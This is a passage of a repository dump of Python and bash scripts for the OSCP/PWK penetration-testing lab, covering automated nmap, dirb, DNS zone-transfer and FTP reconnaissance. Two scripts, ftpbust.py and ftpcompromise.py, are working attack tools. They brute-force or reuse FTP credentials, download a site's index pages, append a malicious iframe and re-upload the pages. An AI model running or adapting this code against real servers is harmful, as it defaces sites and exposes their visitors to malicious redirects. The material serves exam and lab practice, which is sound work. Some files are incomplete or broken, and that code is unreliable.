(reconf.rsltpth, ip_address, port) 65 | extlst = "%s/%s" % (reconf.wordlst, 'extensions_common.txt') 66 | if igncap == True: 67 | dirbargs = "-i -f -S -w" 68 | elif igncap == True: 69 | dirbargs = "-f -S -w" 70 | 71 | if args.s is False and args.ss is False: 72 | WORDLST = os.listdir(reconf.wordlst) 73 | tfiles = len([name for name in os.listdir(reconf.wordlst) if os.path.isfile(os.path.join(reconf.wordlst, name))]) 74 | if args.s is True and args.ss is False: 75 | WORDLST = reconf.moderlst.split(",") 76 | tfiles = len(WORDLST) 77 | if args.ss is True and args.s is False: 78 | WORDLST = reconf.shortlst.split(",") 79 | tfiles = len(WORDLST) 80 | 81 | i = 1 82 | for filename in WORDLST: 83 | fn = "%s/%s" % (reconf.wordlst, filename) 84 | if igncap == True: 85 | dirbargs = "-i -f -S -w" 86 | elif igncap == True: 87 | dirbargs = "-f -S -w" 88 | if os.path.isfile(fn): 89 | print "\033[0;30m[ %s of %s ] Parsing thru %s/%s\033[0;m" % (i, tfiles, reconf.wordlst, filename) 90 | DIRBSCAN = "dirb %s -a \"%s\" %s/%s %s -x %s" % (url, reconf.uagnt5, reconf.wordlst, filename, dirbargs, extlst) 91 | try: 92 | results = subprocess.check_output(DIRBSCAN, shell=True) 93 | resultarr = results.split("\n") 94 | for line in resultarr: 95 | if re.match(r'\A[+]', line) or re.search(r'DIRECTORY', line): 96 | print "[+] Found -> %s" % (line) 97 | with open(outfile, 'a') as file: 98 | file.write("%s\n" % line) 99 | if os.path.isfile(fn): i += 1 100 | except: 101 | pass 102 | 103 | def typeHDR(pattern): 104 | files = os.listdir(reconf.vulns) 105 | for file in files: 106 | if file.find(pattern) != -1: 107 | return file 108 | 109 | def typeSRVR(ip_address, port): 110 | wbxml = "%s/%s_%s_httpheader.xml" % (reconf.exampth, ip_address, port) 111 | try: 112 | info = minidom.parse(wbxml) 113 | protocol, port_number, service, product, version = nmapxml.generic_Info(info) 114 | 115 | vulfiles = ['apache','cgis','domino','fatwire','hpsmh','iis','jboss','jrun','oracle','sap','sunas','tomcat','weblogic','axis','coldfusion','frontpage','hyperion','iplanet','jersey','netware','ror','sharepoing','test','vignette','websphere'] 116 | for file in vulfiles: 117 | if re.search(file, product, re.IGNORECASE): 118 | srvr = typeHDR(file) 119 | return(srvr) 120 | except: 121 | if os.path.isfile(wbxml): 122 | print "Something broke...." 123 | elif not os.path.isfile(wbxml): 124 | print "%s doesn't seem to exists!" % (wbxml) 125 | SNMAP = "nmap -sV -vv -Pn -n -p %s --script=http-headers -oA %s/%s_%s_httpheader %s" % (port, reconf.exampth, ip_address, port, ip_address) 126 | print "Excuting %s" % (SNMAP) 127 | subprocess.call(SNMAP, shell=True) 128 | if os.path.isfile(wbxml): 129 | typeSRVR(ip_address, port) 130 | pass 131 | 132 | def vpnstatus(): 133 | return int(os.popen('ifconfig tap0 | wc -l').read().split()[0]) 134 | 135 | if __name__=='__main__': 136 | # Check if VPN to the Offsec lab is up 137 | if not vpnstatus() > 1: 138 | print "You forgot to connect to the lab" 139 | sys.exit() 140 | 141 | xml_path = "%s/%s.xml" % (reconf.exampth, ip_address) 142 | try: 143 | info = minidom.parse(xml_path) 144 | opsys = nmapxml.get_OS(info) 145 | except: 146 | if os.path.isfile(xml_path): 147 | print "Something broke..." 148 | else: 149 | print "%s doesn't seem to exists!" % (xml_path) 150 | pass 151 | 152 | print "\033[1;33m[*]\033[0;m Operating System is %s" % (opsys) 153 | 154 | if re.search(r'Windows|Microsoft', opsys): 155 | igncap = True 156 | else: 157 | igncap = False 158 | 159 | print "\033[1;32m[*]\033[0;m Parsing %s/%s.nmap" % (reconf.exampth, ip_address) 160 | 161 | fnmap = "%s/%s.nmap" % (reconf.exampth, ip_address) 162 | with open(fnmap, 'r') as searchfile: 163 | for line in searchfile: 164 | if 'open' in line and re.search('http|ssl/http|https', line): 165 | port = re.split('\s+', line)[0] 166 | port = re.split('\/', port)[0].strip() 167 | prot = re.split('\s+', line)[2].strip() 168 | prot = re.split('\?', prot)[0].strip() 169 | if 'ssl/http' in line: prot = 'https' 170 | srvr = typeSRVR(ip_address, port) 171 | #print "%s %s %s %s" % (ip_address, igncap, port, srvr) 172 | dirbBlast(prot, ip_address, port, igncap, srvr) 173 | -------------------------------------------------------------------------------- /dnsrecon.org: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import multiprocessing 4 | from multiprocessing import * 5 | import os 6 | import sys 7 | import re 8 | import reconf 9 | from reconf import * 10 | import time 11 | from functools import wraps 12 | import argparse 13 | import ipaddr 14 | import nmapxml 15 | from nmapxml import * 16 | 17 | parser = argparse.ArgumentParser(description='Run a short or verbose dirb scan') 18 | parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed') 19 | 20 | args = parser.parse_args() 21 | try: 22 | ip_address = ipaddr.IPAddress(args.ip) 23 | except: 24 | print "Try again..." 25 | sys.exit() 26 | 27 | HOSTNAME = "nmblookup -A %s | grep '<00>' | grep -v '' | cut -d' ' -f1" % (ip_address)# grab the hostname 28 | host = subprocess.check_output(HOSTNAME, shell=True).strip() 29 | print "INFO: Attempting Domain Transfer on " + host 30 | ZT = "dig @%s.thinc.local thinc.local axfr" % (host) 31 | ztresults = subprocess.check_output(ZT, shell=True) 32 | if "failed" in ztresults: 33 | print "INFO: Zone Transfer failed for " + host 34 | else: 35 | print "[*] Zone Transfer successful for " + host + "(" + ip_address + ")!!! [see output file]" 36 | #outfile = exampth + "/" + ip_address + "_zonetransfer.txt" 37 | outfile = "%s/%s_zonetransfer.txt" % (reconf.exampth, ip_address) 38 | dnsf = open(outfile, "w") 39 | dnsf.write(ztresults) 40 | dnsf.close 41 | 42 | -------------------------------------------------------------------------------- /dnsrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | from subprocess import * 4 | import sys 5 | import os 6 | import re 7 | import reconf 8 | from reconf import * 9 | import argparse 10 | import ipaddr 11 | import nmapxml 12 | from nmapxml import * 13 | import dns.name 14 | import dns.query 15 | import dns.dnssec 16 | import dns.message 17 | import dns.resolver 18 | import dns.rdatatype 19 | import dns.zone 20 | 21 | parser = argparse.ArgumentParser(description='Run a DNS scan') 22 | parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed') 23 | 24 | args = parser.parse_args() 25 | try: 26 | ip_address = ipaddr.IPAddress(args.ip) 27 | ip_address = str(ip_address) 28 | except: 29 | print "Not a valid IP. Try again..." 30 | sys.exit() 31 | 32 | def turnc_ad(s, d, n=3): 33 | return d.join(s.split(d)[:n]) 34 | 35 | def turnc_bc(s, d, n=1): 36 | return d.join(s.split(d)[n:]) 37 | 38 | sbn = turnc_ad(ip_address, '.') 39 | 40 | print "SBN %s" % sbn 41 | 42 | dnsfile = "%s/%s_DNSDIS.xml" % (reconf.exampth, sbn) 43 | if not os.path.isfile(dnsfile): 44 | DNSDIS = "nmap -sV -vv -Pn -n -p U:53,T:53 --open -oA %s/%s_DNSDIS %s" % (reconf.exampth, sbn, reconf.fulliprng) 45 | subprocess.call(DNSDIS, shell=True) 46 | 47 | wbxml = "%s/%s_DNSDIS.xml" % (reconf.exampth, sbn) 48 | info = minidom.parse(wbxml) 49 | dnslst = nmapxml.get_All_IP(info).split(',') 50 | 51 | myresolver = dns.resolver.Resolver() 52 | myresolver.nameservers = dnslst 53 | reverseip = '.'.join(ip_address.split('.')[::-1]) 54 | ptrlookup = reverseip + '.in-addr.arpa' 55 | hostname = str(myresolver.query(ptrlookup,"PTR")[0]).rstrip('.') 56 | domain = turnc_bc(hostname, '.') 57 | domindot = domain + '.' 58 | 59 | request = dns.message.make_query(domindot, dns.rdatatype.DNSKEY, want_dnssec=True) 60 | 61 | outfile = "%s/%s_dnschk" % (reconf.rsltpth, ip_address) 62 | with open(outfile, 'a') as file: 63 | file.write("Hostname: %s" % hostname) 64 | file.write("Domain: %s" % domain) 65 | 66 | for nserver in dnslst: 67 | response = dns.query.udp(request, nserver) 68 | file.write("Response %s" % response) 69 | file.write("Answer: %s" % response.answer) 70 | file.write("Response Code: %s" % response.rcode()) 71 | DNSCHK = "nmap -vv -sn -Pn %s -oA %s/%s_DNSZONE --script dns-check-zone --script-args='dns-check-zone.domain=%s'" % (nserver, reconf.rsltpth, ip_address, domain) 72 | subprocess.call(DNSCHK, shell=True) 73 | axfr = dns.query.xfr(nserver, domindot, lifetime=5) 74 | try: 75 | zone = dns.zone.from_xfr(axfr) 76 | if zone == "": 77 | file.write("Success: %s @ %s" % (domain, nserver)) 78 | for name, node in zone.nodes.items(): 79 | rdatasets = node.rdatasets 80 | for rdataset in rdatasets: 81 | file.write("%s %s" % name, rdataset) 82 | else: 83 | continue 84 | except: 85 | continue 86 | -------------------------------------------------------------------------------- /exploitdb.txt: -------------------------------------------------------------------------------- 1 | https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/vulscan.nse 2 | -------------------------------------------------------------------------------- /f.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess 4 | import multiprocessing 5 | from multiprocessing import * 6 | import os 7 | import sys 8 | import re 9 | import reconf 10 | from reconf import * 11 | import time 12 | from functools import wraps 13 | import argparse 14 | import ipaddr 15 | import nmapxml 16 | from nmapxml import * 17 | import ftputil 18 | import ftplib 19 | 20 | parser = argparse.ArgumentParser(description='Scan for FTP websites using creds discovered with hydra, search for index files append malicous code into it, then upload it back') 21 | parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed') 22 | 23 | args = parser.parse_args() 24 | try: 25 | ip_address = ipaddr.IPAddress(args.ip) 26 | except: 27 | print "Try again..." 28 | sys.exit() 29 | 30 | ip_address = str(ip_address) 31 | 32 | def ftpLogin(ip_address, u, p): 33 | try: 34 | ftp = ftputil.FTPHost(ip_address, u, p) 35 | print "[+] %s - FTP using %s/%s is Permitted" % (ip_address, u, p) 36 | return(ftp) 37 | except OSError: 38 | print "[-] %s - FTP using %s/%s is not allowed" % (ip_address, u, p) 39 | pass 40 | 41 | fnmap = "%s/%s_ftp_hydra.txt" % (reconf.rsltpth, ip_address) 42 | try: 43 | fnmap = "%s/%s_ftp_hydra.txt" % (reconf.rsltpth, ip_address) 44 | print "\033[1;31m [!] \033[0;m Parsing %s for creds" % (fnmap) 45 | with open(fnmap, 'r') as searchfile: 46 | for line in searchfile: 47 | if 'login:' in line and 'password:' in line: 48 | u = re.split('\s+', line)[4].strip() 49 | p = re.split('\s+', line)[6].strip() 50 | ftp = ftpLogin(ip_address, u, p) 51 | recursive = ftp.walk("/",topdown=True,onerror=None) 52 | for root,dirs,files in recursive: 53 | for dlst in dirs: 54 | results = "%s\n" % dlst 55 | if dlst != "": 56 | #f.write(results) 57 | print results 58 | for fname in files: 59 | results = "%s/%s\n" % (root, fname) 60 | if fname != "": 61 | #f.write(results) 62 | print results 63 | if re.search(r'^(index)[.](htm|html|asp|php)', fname): 64 | print "[+] Found default page %s at %s" % (fname, root) 65 | try: 66 | print "Downloading %s with U %s P %s" % (fname, u, p) 67 | ftp.upload_if_newer(fname, ("%s/%s" % (root, fname))) 68 | except Exception, e: 69 | print e 70 | except Exception, e: 71 | pass 72 | finally: 73 | print "\033[1;31m [!] \033[0;m Assessment Complete." 74 | -------------------------------------------------------------------------------- /f1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import multiprocessing 4 | from multiprocessing import * 5 | import os 6 | import sys 7 | import re 8 | import reconf 9 | from reconf import * 10 | import time 11 | from functools import wraps 12 | import argparse 13 | import ipaddr 14 | import nmapxml 15 | from nmapxml import * 16 | import ftputil 17 | 18 | parser = argparse.ArgumentParser(description='Run a short or verbose dirb scan') 19 | parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed') 20 | 21 | args = parser.parse_args() 22 | try: 23 | ip_address = ipaddr.IPAddress(args.ip) 24 | except: 25 | print "Try again..." 26 | sys.exit() 27 | 28 | ip_address = str(ip_address) 29 | 30 | def anonLogin(ip_address): 31 | try: 32 | ftp = ftputil.FTPHost(ip_address, "anonymous", "a@a.com") 33 | print "[+] %s - Anonymous FTP is Permitted" % ip_address 34 | return True 35 | except Exception, e: 36 | print "[-] %s - Anonymous FTP not allowed" % ip_address 37 | return False 38 | 39 | def bruteLogin(ip_address): 40 | BLOGIN = "./brutepwd.py -ip %s -s ftp -hy" % ip_address 41 | results = subprocess.check_output(BLOGIN, shell=True) 42 | print results 43 | 44 | return ("anonymous", "a@a.com") 45 | 46 | outfile = "%s/%s_ftpwalk.txt" % (reconf.rsltpth, ip_address) 47 | f = open(outfile, 'w') 48 | if anonLogin(ip_address): 49 | ftp = ftputil.FTPHost(ip_address, "anonymous", "a@a.com") 50 | else: 51 | if os.path.isfile("%s/%s_ftp_hydra.txt" % (reconf.rsltpth, ip_address)): 52 | 53 | else: 54 | usern, password = bruteLogin(ip_address) 55 | ftp = ftputil.FTPHost(ip_address, "anonymous", "a@a.com") 56 | try: 57 | recursive = ftp.walk("/",topdown=True,onerror=None) 58 | for root,dirs,files in recursive: 59 | for dlst in dirs: 60 | results = "%s\n" % dlst 61 | if dlst != "": 62 | f.write(results) 63 | for fname in files: 64 | results = "%s/%s\n" % (root, fname) 65 | if fname != "": 66 | f.write(results) 67 | if re.search(r'^(index)[.](htm|html|asp|php)', fname): 68 | print "[+] Found default page %s at %s" % (fname, root) 69 | except: 70 | pass 71 | 72 | ftp.close 73 | -------------------------------------------------------------------------------- /ftpbust.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess 4 | import multiprocessing 5 | from multiprocessing import * 6 | import os 7 | import sys 8 | import re 9 | import reconf 10 | from reconf import * 11 | import time 12 | from functools import wraps 13 | import argparse 14 | import ipaddr 15 | import nmapxml 16 | from nmapxml import * 17 | import ftputil 18 | 19 | RED = '\033[1;31m[#]\033[0;m' 20 | GREEN = '\033[1;32m[*]\033[0;m' 21 | YELLOW = '\033[1;33m[!]\033[0;m' 22 | BLUE = '\033[1;34m[+]\033[0;m' 23 | PURPLE = '\033[1;35m[+]\033[0;m' 24 | CYAN = '\033[1;36m[+]\033[0;m' 25 | WHITE = '\033[1;37m[*]\033[0;m' 26 | 27 | parser = argparse.ArgumentParser(description='Scan for FTP websites using creds discovered with hydra, search for index files append malicous code into it, then upload it back') 28 | parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed') 29 | 30 | args = parser.parse_args() 31 | try: 32 | ip_address = ipaddr.IPAddress(args.ip) 33 | except: 34 | print "%s %s is not correct. Try again..." % (RED, ip_address) 35 | sys.exit() 36 | 37 | ip_address = str(ip_address) 38 | 39 | def ftpLogin(ip_address, u, p): 40 | try: 41 | ftp = ftputil.FTPHost(ip_address, u, p) 42 | print "%s FTP to %s using %s/%s is Permitted" % (GREEN, ip_address, u, p) 43 | return(ftp) 44 | except OSError as error: 45 | print "%s FTP to %s using creds %s:%s is not allowed" % (RED, ip_address, u, p) 46 | pass 47 | return 48 | 49 | def injectPage(fname): 50 | try: 51 | print "%s Inserting code into %s" % (RED, fname) 52 | f = open(("%s" % fname), 'a') 53 | f.write(reconf.iframe1) 54 | f.close() 55 | finally: 56 | pass 57 | 58 | fnmap = "%s/%s_ftp_hydra.txt" % (reconf.rsltpth, ip_address) 59 | try: 60 | with open(fnmap) as ft: 61 | print "%s Checking if %s exists" % (GREEN, fnmap) 62 | except: 63 | print "%s %s doesn't exists, running brute force to find creds" % (YELLOW, fnmap) 64 | BRUTEUS = "./brutepwd.py -ip %s -s ftp -hy" % ip_address 65 | try: 66 | if os.path.isfile('hydra.restore'): 67 | os.remove('hydra.restore') 68 | subprocess.call(BRUTEUS, shell=True) 69 | except subprocess.CalledProcessError: 70 | pass 71 | except OSError: 72 | pass 73 | finally: 74 | print "%s Brute force of %s is completed." % (GREEN, ip_address) 75 | pass 76 | 77 | try: 78 | fnmap = "%s/%s_ftp_hydra.txt" % (reconf.rsltpth, ip_address) 79 | fwname = "%s/%s_ftp_results.txt" % (reconf.rsltpth, ip_address) 80 | print "%s Parsing %s for creds" % (GREEN, fnmap) 81 | seenusrpwd = set() 82 | seenfname = set() 83 | with open(fnmap, 'r') as searchfile: 84 | fw = open(fwname, 'w') 85 | for line in searchfile: 86 | if 'login:' in line and 'password:' in line: 87 | u = re.split('\s+', line)[4].strip() 88 | p = re.split('\s+', line)[6].strip() 89 | usrpwd = "%s:%s" % (u, p) 90 | if usrpwd not in seenusrpwd: 91 | print "%s Using %s creds to FTP into %s" % (GREEN, usrpwd, ip_address) 92 | seenusrpwd.add(usrpwd) 93 | ftp = ftpLogin(ip_address, u, p) 94 | try: 95 | fw.write(("Creds: %s\n" % usrpwd)) 96 | recursive = ftp.walk("/",topdown=True,onerror=None) 97 | for root,dirs,files in recursive: 98 | for dlst in dirs: 99 | print "%s Discovered the following directory %s" % (GREEN, dlst) 100 | fw.write(("Directory: %s\n" % (dlst))) 101 | for fname in files: 102 | print "%s Discovered the following file %s in %s directory" % (GREEN, fname, root) 103 | fw.write(("File: %s/%s\n" % (root, fname))) 104 | if re.search(r'^(index)[.](htm|html|asp|php)', fname): 105 | print "%s Found default page %s at %s" % (YELLOW, fname, root) 106 | try: 107 | 108 | if fname not in seenfname: 109 | seenfname.add(fname) 110 | print "%s Downloading %s with U %s P %s" % (YELLOW, fname, u, p) 111 | fw.write("Downloaded %s\n" % fname) 112 | ftp.download(("%s/%s" % (root, fname)), fname) 113 | injectPage(fname) 114 | fw.write(("Injected following code %s into %s\n" % (reconf.iframe1, fname))) 115 | try: 116 | print "%s Uploading %s back to %s in %s" % (YELLOW, fname, ip_address, root) 117 | fw.write(("Uploaded %s was successful.\n" % fname)) 118 | ftp.upload_if_newer(fname, ("%s/%s" % (root, fname))) 119 | except: 120 | print "%s Could not upload %s back to %s in %s" % (RED, fname, ip_address, root) 121 | fw.write(("Uploading of %s was not completed using %s.\n" % (fname, usrpwd))) 122 | except: 123 | pass 124 | except: 125 | pass 126 | except: 127 | pass 128 | finally: 129 | print "%s Assessment Complete." % GREEN 130 | fw.close() 131 | -------------------------------------------------------------------------------- /ftpcompromise.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import ftplib 3 | import optparse 4 | import time 5 | 6 | 7 | def anonLogin(hostname): 8 | try: 9 | ftp = ftplib.FTP(hostname) 10 | ftp.login('anonymous', 'me@your.com') 11 | print '\n[*] ' + str(hostname) \ 12 | + ' FTP Anonymous Logon Succeeded.' 13 | ftp.quit() 14 | return True 15 | except Exception, e: 16 | print '\n[-] ' + str(hostname) +\ 17 | ' FTP Anonymous Logon Failed.' 18 | return False 19 | 20 | 21 | def bruteLogin(hostname, passwdFile): 22 | pF = open(passwdFile, 'r') 23 | for line in pF.readlines(): 24 | time.sleep(1) 25 | userName = line.split(':')[0] 26 | passWord = line.split(':')[1].strip('\r').strip('\n') 27 | print '[+] Trying: ' + userName + '/' + passWord 28 | try: 29 | ftp = ftplib.FTP(hostname) 30 | ftp.login(userName, passWord) 31 | print '\n[*] ' + str(hostname) +\ 32 | ' FTP Logon Succeeded: '+userName+'/'+passWord 33 | ftp.quit() 34 | return (userName, passWord) 35 | except Exception, e: 36 | pass 37 | print '\n[-] Could not brute force FTP credentials.' 38 | return (None, None) 39 | 40 | 41 | def returnDefault(ftp): 42 | try: 43 | dirList = ftp.nlst() 44 | except: 45 | dirList = [] 46 | print '[-] Could not list directory contents.' 47 | print '[-] Skipping To Next Target.' 48 | return 49 | 50 | retList = [] 51 | for fileName in dirList: 52 | fn = fileName.lower() 53 | if '.php' in fn or '.htm' in fn or '.asp' in fn: 54 | print '[+] Found default page: ' + fileName 55 | retList.append(fileName) 56 | return retList 57 | 58 | 59 | def injectPage(ftp, page, redirect): 60 | f = open(page + '.tmp', 'w') 61 | ftp.retrlines('RETR ' + page, f.write) 62 | print '[+] Downloaded Page: ' + page 63 | 64 | f.write(redirect) 65 | f.close() 66 | print '[+] Injected Malicious IFrame on: ' + page 67 | 68 | ftp.storlines('STOR ' + page, open(page + '.tmp')) 69 | print '[+] Uploaded Injected Page: ' + page 70 | 71 | 72 | def attack(username,password,tgtHost,redirect): 73 | ftp = ftplib.FTP(tgtHost) 74 | ftp.login(username, password) 75 | defPages = returnDefault(ftp) 76 | for defPage in defPages: 77 | injectPage(ftp, defPage, redirect) 78 | 79 | 80 | def main(): 81 | parser = optparse.OptionParser('usage %prog '+\ 82 | '-H -r '+\ 83 | '[-f ]') 84 | 85 | parser.add_option('-H', dest='tgtHosts',\ 86 | type='string', help='specify target host') 87 | parser.add_option('-f', dest='passwdFile',\ 88 | type='string', help='specify user/password file') 89 | parser.add_option('-r', dest='redirect',\ 90 | type='string',help='specify a redirection page') 91 | 92 | (options, args) = parser.parse_args() 93 | tgtHosts = str(options.tgtHosts).split(',') 94 | passwdFile = options.passwdFile 95 | redirect = options.redirect 96 | 97 | if tgtHosts == None or redirect == None: 98 | print parser.usage 99 | exit(0) 100 | 101 | for tgtHost in tgtHosts: 102 | username = None 103 | password = None 104 | 105 | if anonLogin(tgtHost) == True: 106 | username = 'anonymous' 107 | password = 'me@your.com' 108 | print '[+] Using Anonymous Creds to attack' 109 | attack(username, password, tgtHost, redirect) 110 | 111 | elif passwdFile != None: 112 | (username, password) =\ 113 | bruteLogin(tgtHost, passwdFile) 114 | if password != None: 115 | '[+] Using Creds: ' +\ 116 | username + '/' + password + ' to attack' 117 | attack(username, password, tgtHost, redirect) 118 | 119 | if __name__ == '__main__': 120 | main() 121 | -------------------------------------------------------------------------------- /ftprecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | import os 5 | import reconf 6 | from reconf import * 7 | 8 | if len(sys.argv) != 3: 9 | print "Usage: ftprecon.py " 10 | sys.exit(0) 11 | 12 | ip_address = sys.argv[1].strip() 13 | port = sys.argv[2].strip() 14 | 15 | print "INFO: Performing nmap FTP script scan for " + ip_address + ":" + port 16 | FTPSCAN = "nmap -sV -Pn -vv -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oA %s/%s_ftp.nmap %s" % (port, reconf.exampth, ip_address, ip_address) 17 | subprocess.check_output(FTPSCAN, shell=True) 18 | 19 | print "INFO: Performing password disovery on FTP against " + ip_address 20 | BRUTE = "./brutepwd.py -ip %s -a" % ip_address 21 | subprocess.call(BRUTE, shell=True) 22 | -------------------------------------------------------------------------------- /gogolab.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ulimit -n 1024000 4 | ulimit -Hn 1024000 5 | ulimit -Sn 1024000 6 | 7 | function postVPN { 8 | gnome-terminal -e htop 9 | gnome-terminal -e iftop 10 | gnome-terminal --working-directory=/data/lab/results 11 | gnome-terminal --working-directory=/data/lab/scripts/oscp 12 | 13 | if [ $(ps ax | grep vmware-vmx | grep -v grep | wc -l) -lt 1 ]; then 14 | vmrun -T player start "${PWD}/vm/Offsec PWK VM.vmx" 15 | fi 16 | if [ $(ps ax | grep iceweasel | grep -v grep | wc -l) -lt 1 ]; then 17 | iceweasel 'https://10.70.70.70/oscpanel/labcpanel.php?md=b65c572dd9b210b3dff52be9b4c7997b&pid=189465&servers=1'& 18 | fi 19 | } 20 | 21 | function chkVPN { 22 | tcpdump -i $(ifconfig | grep tap | cut -d":" -f1) not arp and not rarp and not 'tcp[13] & 4!=0' 23 | } 24 | 25 | if [ $(type vmrun | wc -l) -lt 1 ]; then 26 | echo -e '\e[01;33m[i]\e[00m vmrun is not available' 27 | echo -e 'Go to https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0|PLAYER-1200|drivers_tools' 28 | echo -e 'to download the API' 29 | iceweasel 'https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0|PLAYER-1200|drivers_tools' 30 | exit 31 | fi 32 | 33 | if [ $(ifconfig | grep tap | cut -d":" -f1 | wc -l) -lt 1 ]; then 34 | echo -e '\e[01;33m[i]\e[00m Connecting to the lab...' 35 | cd /data/lab 36 | ./openlab 37 | postVPN 38 | chkVPN 39 | else 40 | if [ $(ifconfig | grep tap | cut -d":" -f1 | wc -l) -ge 1 ]; then 41 | echo -e '\e[01;33m[i]\e[00m Already connected to the lab...' 42 | postVPN 43 | ./t.sh 44 | fi 45 | fi 46 | -------------------------------------------------------------------------------- /nmapxml.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import reconf 3 | from reconf import * 4 | from xml.dom import minidom 5 | 6 | def iter_hosts(info): 7 | hosts_nodes = info.getElementsByTagName("host") 8 | for host_node in hosts_nodes: 9 | yield(host_node) 10 | 11 | def get_IP_Address(info): 12 | '''Fetch the IP address from the XML object''' 13 | ip_address = str() 14 | info_detail = info.getElementsByTagName("address") 15 | for address in info_detail: 16 | if(address.getAttribute("addrtype") == "ipv4"): 17 | ip_address = address.getAttribute("addr") 18 | break 19 | 20 | return(ip_address) 21 | 22 | def get_All_IP(info): 23 | info_detail = info.getElementsByTagName("address") 24 | ipaddrs=[] 25 | for address in info_detail: 26 | if(address.getAttribute("addrtype") == "ipv4"): 27 | ipaddrs.append(address.getAttribute("addr").encode('ascii')) 28 | return ','.join(ipaddrs) 29 | 30 | def get_FQDN(info): 31 | fqdn = str() 32 | info_detail = info.getElementsByTagName("hostname") 33 | for hostname in info_detail: 34 | if(hostname.getAttribute("name")): 35 | fqdn = hostname.getAttribute("name") 36 | break 37 | 38 | return(fqdn) 39 | 40 | def get_OS(info): 41 | '''Determine the OS by the greatest percentage in accuracy''' 42 | os = str() 43 | os_hash = dict() 44 | percentage = list() 45 | 46 | info_detail = info.getElementsByTagName("osmatch") 47 | 48 | for os_detail in info_detail: 49 | guessed_os = os_detail.getAttribute("name") 50 | accuracy = os_detail.getAttribute("accuracy") 51 | if(guessed_os and accuracy): 52 | os_hash[float(accuracy)] = guessed_os 53 | 54 | percentages = os_hash.keys() 55 | if(percentages): 56 | max_percent = max(percentages) 57 | os = os_hash[max_percent] 58 | 59 | return(os) 60 | 61 | def headersEnum(ip_address, port): 62 | print "\033[0;33m[>]\033[0;m Identifying Server type on %s" % (url) 63 | HEADSCAN = "nmap -sV -vv -Pn -n -p %s --script=http-headers -oA %s/%s_%s_httpheader %s" % (port, reconf.exampth, ip_address, port, ip_address) 64 | try: 65 | subprocess.call(HEADSCAN, shell=True) 66 | except: 67 | pass 68 | 69 | def generic_Info(info): 70 | info_detail = info.getElementsByTagName("port") 71 | for port_details in info_detail: 72 | protocol = port_details.getAttribute("protocol") 73 | port_number = port_details.getAttribute("portid") 74 | 75 | port_service = port_details.getElementsByTagName("state") 76 | for port_services in port_service: 77 | port_state = port_services.getAttribute("state") 78 | 79 | if(port_state == "open"): 80 | 81 | service_info = port_details.getElementsByTagName("service") 82 | for service_details in service_info: 83 | service = service_details.getAttribute("name") 84 | product = service_details.getAttribute("product") 85 | version = service_details.getAttribute("version") 86 | 87 | return(protocol, port_number, service, product, version) 88 | 89 | def getiter_Port_Information(info): 90 | '''Fetch port and service information''' 91 | info_detail = info.getElementsByTagName("port") 92 | for port_details in info_detail: 93 | protocol = port_details.getAttribute("protocol") 94 | port_number = port_details.getAttribute("portid") 95 | 96 | port_service = port_details.getElementsByTagName("state") 97 | for port_services in port_service: 98 | port_state = port_services.getAttribute("state") 99 | 100 | if(port_state == "open"): 101 | 102 | service_info = port_details.getElementsByTagName("service") 103 | for service_details in service_info: 104 | service = service_details.getAttribute("name") 105 | product = service_details.getAttribute("product") 106 | version = service_details.getAttribute("version") 107 | 108 | yield(port_number,protocol,service,product,version) 109 | 110 | def xml2csv(info): 111 | '''Initiate parsing of nmap XML file and create CSV string object''' 112 | csv_string = "" 113 | csv_header = "IP Address,FQDN,OS,Port,Protocol,Service,Name,Version\n" 114 | csv_format = '{0},"{1}","{2}",{3},{4},"{5}","{6}","{7}"\n' 115 | 116 | csv_string += csv_header 117 | 118 | ip = get_IP_Address(info) 119 | fqdn = get_FQDN(info) 120 | os = get_OS(info) 121 | 122 | for port,protocol,service,product,version in getiter_Port_Information(info): 123 | csv_string += csv_format.format(ip,fqdn,os,port,protocol,service,product,version) 124 | 125 | csv_outfile = "%s/%s.csv" % (reconf.rsltpth, ip) 126 | csv_output = open(csv_outfile, "w") 127 | csv_output.write(csv_string) 128 | csv_output.close() 129 | -------------------------------------------------------------------------------- /nmapxml.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crsftw/oscp/3c6009f013016b63dcf9bffe020a8844455355c8/nmapxml.pyc -------------------------------------------------------------------------------- /oportscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import multiprocessing 4 | from multiprocessing import * 5 | import os 6 | import sys 7 | import time 8 | import nmap 9 | import re 10 | import reconf 11 | from reconf import * 12 | import time 13 | from functools import wraps 14 | 15 | if len(sys.argv) != 2: 16 | print "Usage: deeprecon.py " 17 | sys.exit(0) 18 | 19 | ip_address = sys.argv[1].strip() 20 | folders = [reconf.wordlst, reconf.vulns] 21 | 22 | def hms(seconds): 23 | m, s = divmod(seconds, 60) 24 | h, m = divmod(m, 60) 25 | return("%d:%02d:%02d:" % (h, m, s)) 26 | 27 | def fn_timer(function): 28 | @wraps(function) 29 | def function_timer(*args, **kwargs): 30 | t0 = time.time() 31 | result = function(*args, **kwargs) 32 | t1 = time.time() 33 | print ("Total time running %s: %s" % 34 | (function.func_name, hms(t1-t0)) 35 | ) 36 | return result 37 | return function_timer 38 | 39 | def multProc(targetin, scanip, port): 40 | jobs = [] 41 | p = multiprocessing.Process(target=targetin, args=(scanip,port)) 42 | jobs.append(p) 43 | p.start() 44 | return 